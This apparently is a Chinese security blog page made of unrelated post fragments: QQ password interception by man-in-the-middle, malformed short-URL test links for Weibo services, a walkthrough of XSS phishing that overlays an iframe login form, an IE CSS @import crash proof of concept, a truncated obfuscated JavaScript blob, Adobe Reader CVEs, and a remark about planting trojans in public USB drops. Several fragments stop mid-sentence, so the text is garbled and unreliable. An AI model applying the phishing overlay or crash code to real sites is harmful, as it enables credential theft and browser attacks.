Heart

 看到大家对“网路岗可截获QQ密码和聊天记录”中QQ文本信息如何被截获有很多说法。我翻出来几年前写的“QQ2009正式版SP4文本信息和文件传输的安全性研究”贴在这里（xeye的网站被墙，转这里一份）。我想说的是QQ在网络中传输的加密算法是没有问题的。此次网络岗事件，是由于网络岗使用了中间人攻击：这个软件使QQ登陆时帐号异常，强迫用户去输入密码解锁，此时就完成了中间人攻击，QQ明文密码被截获到。然后软件使用QQ密码的2遍MD5做密钥，解开QQ聊天文本信息。这种中间人攻击的隐蔽性比较强，因为QQ有时候会经常弹出框说异地登录要输入什么东东之类的，所以用户看到这样的情况也习以为常，不会想到被攻击。就像小G说的“ 我现在开机就弹登陆异常，要输入验证码，哪天要是假窗口要密码，也许我也会填。。。最近一直在外地，习惯了填这个”。

如果要深入了解QQ的加密密钥如何产生，聊天信息在网络中传输是否安全，请阅读下文。

==================================================

QQ2009正式版SP4文本信息和文件传输的安全性研究

Author: xisigr[xeye]

EMail: xisigr@gmail.com

Site: http://xeyeteam.appspot.com

Date: 2009-10-27

[ 目录 ]

0x00 前言

0x01 TEA算法简介

均为当前最新版本

chrome 15.0.874.121 m

Opera 11.52

t.sina.com：

http://t.cn/:/../hudyO

http://t.cn/../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../:/../hudyO

t.qq.com：

http://url.cn/:/../0vzjwu

http://url.cn/../../../../../../../../../../../../../../../../../../../../../../../../../../../../:/../0vzjwu

http://url.cn/:/../0vzjwu/admin.php

t.163.com：

http://163.fm/:/../VSDmjEk

http://163.fm/../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../:/../DRTHmQ

t.sohu.com

http://t.itc.cn/:/../8jV2Q

http://t.itc.cn/../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../:/8jV2Q

把以上链接在微博中广播进行测试。发现这四个厂商的短地址服务对处理:/../出现异常，导致在微博中用户无法看到真正的源地址链接。Twitter中也存在这样的

在"利用XSS漏洞进行网络钓鱼攻击"的漏洞例子中，像黑锅提及的直接劫持表单取字段内容，应该是最快最方便的窃取用户信息的手段，这里讨论的是通过XSS进行页面模块覆盖来达到劫持的效果。关于XSS钓鱼，很多高手都有不同的方法，这里只是把高手们几句话带过的方法展开来说下。温故而知新，才可更猥亵。

为了使攻击更具有真实性，就在实际环境中测试吧。图就不PS了，SOHU也可尽快修复这个XSS。

1  图1，你确保输入安全了？

图 1

2  图2，当把IFRAME的属性frameborder打开后，看到的真实内容。

图2

3  图3，钓鱼模块很简单.

图3

前提：页面http://www.example.com/login?x=……存在一处反射式XSS漏洞

目的：获取http://www.example.com/login的用户登录信息

通过XSS漏洞，构造钓鱼页面，获取用户登录信息：

1 构造钓鱼页面，其中包括用户名输入，密码输入，提交按钮。

2 使用<iframe>包含钓鱼页面，塞入XSS漏洞处进行模块覆盖。

其中1中构造比较简单，看登录程序流程设计，可用户名和密码偷走入库与真实提交登录同时进行，当然也可以加些跳转语句等。总之就是让用户看来提交顺利，并无异常，以免用户怀疑。

真正的技巧在于2上，传统的钓鱼网站一般是域名和页面都是独立的，且极力做到和被钓鱼网站相似。而如何使用一个XSS来进行钓鱼。这里的XSS可以是反射式也可以是存储式。<iframe>的设计要有些讲究，钓鱼的精髓之一就是美工，这样假与真才不好分辨。对于可见的<iframe>标签，样式控制和自身属性足以达到让“内部框架“与邻近的内容相融合。使用样式控制精确定位，使钓鱼页面的输入控件覆盖被钓鱼页面的输入控件，来达到数据劫持的效果。这看似极为像Clickjacking攻击模式，只是Clickjacking攻击的特点是<iframe>是为了不让用户看到，而在这里我们恰恰是为了让用户看到<iframe>中的内容。

对于模块覆盖，这种劫持范围可大可小

 这个是0Day，IE CSS import "Crash"，都说Crash洞很难利用或几乎不能被利用，但在作者看来这也未必。

//html file

<div style="position: absolute; top: -999px;left: -999px;">

<link href="css.css" rel="stylesheet" type="text/css" />

//css file

{

  color:red;

}

@import url("css.css");

@import url("css.css");

@import url("css.css");

@import url("css.css");

这次微软补丁MS10 - 090中的7个IE漏洞，6个是Crash。

ﾟωﾟﾉ= /｀ｍ´）ﾉ ~┻━┻   //*´∇｀*/ ['_']; o=(ﾟｰﾟ)  =_=3; c=(ﾟΘﾟ) =(ﾟｰﾟ)-(ﾟｰﾟ); (ﾟДﾟ) =(ﾟΘﾟ)= (o^_^o)/ (o^_^o);(ﾟДﾟ)={ﾟΘﾟ: '_' ,ﾟωﾟﾉ : ((ﾟωﾟﾉ==3) +'_') [ﾟΘﾟ] ,ﾟｰﾟﾉ :(ﾟωﾟﾉ+ '_')[o^_^o -(ﾟΘﾟ)] ,ﾟДﾟﾉ:((ﾟｰﾟ==3) +'_')[ﾟｰﾟ] }; (ﾟДﾟ

在你的机器上试试这两个链接：

iPhone Fake Title Bar

Android Fake Title Bar

info:

http://evil-lemur.com/mobile/

http://blogs.sans.org/appsecstreetfighter/2010/11/29/ui-spoofing-safari-iphone/

近几年Adobe Reader漏洞日益增多：

CVE-2007-5659的collectEmailInfo

CVE-2008-2992的util.printf

CVE-2009-0927的getIcon

CVE-2009-1492的getAnnots

CVE-2009-1493的customDictionaryOpen

CVE-2009-4324的media.newPlayer

CVE-2009-4324的U3D file

CVE-2010-0188的image/tif

CVE-2010-1240的Launch Action

CVE-2010-4091的printSeps 关于最新的cve-2010-4091这个漏洞分析可以在这里查看。

发现PDF的这些漏洞大都涉及到pdf 的参数，javascript引擎，函数库，Launch这些方面上。拿Launch来说，Adobe Reader 9.3.3以前，在(/Launch /Action）的处理上存在问题，虽然有弹框提示，但也允许执行任意命令，后来9.3.3以后这种方式修补了，可又没有对双引号进行合理过滤，导致。到了9.4.0又出来了一个新问题，今天看到“Another PDF Launch Action Oddity”这篇文章，Adobe Reader 9.4在处理文件打印的时候（ /O (print)），并没有给用户任何提示就执行了，如果默认进行10000次打印，那么这是否可以发起一次Black fax攻击呢？

Adobe的这种漏洞趋势，促成微软和Adobe达成协议，Adobe漏洞收录到MAPP中。这是一件好事。

PS:

看了黑哥的：“而且这些

       ‘秘密情报传递点（Dead Drops）’是一个在公共场所实施的匿名、离线、P2P 文件分享项目。项目创始人把U盘嵌入到墙壁里、大楼上、计程车里，任何人都可以在公共场所访问。目前这个项目只在纽约市范围内进行。项目参与者需要得到项目发起人的邀请，然后去所在地点放置或寻找藏在情报秘密传递点中的文件。把你的笔记本插在墙上、房子上或电线杆上分享你的文件和日期。每个情报点都包含一个readme.txt 文件，对该项目进行了解释。

‘Dead Drops’目前仍在开发之中，将陆续进入更多城市。该项目很快将推出完整的文档、电影、地图和情报点制作手册。

这个传送文件的思路真是邪恶而有创意啊。如果是我路过，我会偷偷在USB里放入个病毒木马啥的，那就有意思了。

通过智能手机发起一次攻击，可以是手机监听，手机软件植入木马，也可以使用其他的方法，比如制作一个恶意Clickjacking的网站，然后使用iphone等移动设备去访问，是否会发生“触摸劫持”呢？

比如在这样的智能手机上看新闻，但实际上你却触摸到了一个隐藏的按钮，结果却发送了汇款交易。这样的欺骗操作或许在智能手机上更容易成功，比如屏幕本来就小，浏览器版本更新缓慢……。那么现在的智能手机的设计上，是否能阻止这样的攻击？

Frame Busting可以阻止，但又有几个网站加入这样的代码，尤其还是在移动站点上。也许移动网站上的安全应该和非移动网站上的安全应同等受到重视。智能手机上的安全，也是下一个值得去研究的新方向。

http://www.technologyreview.com/communications/26057/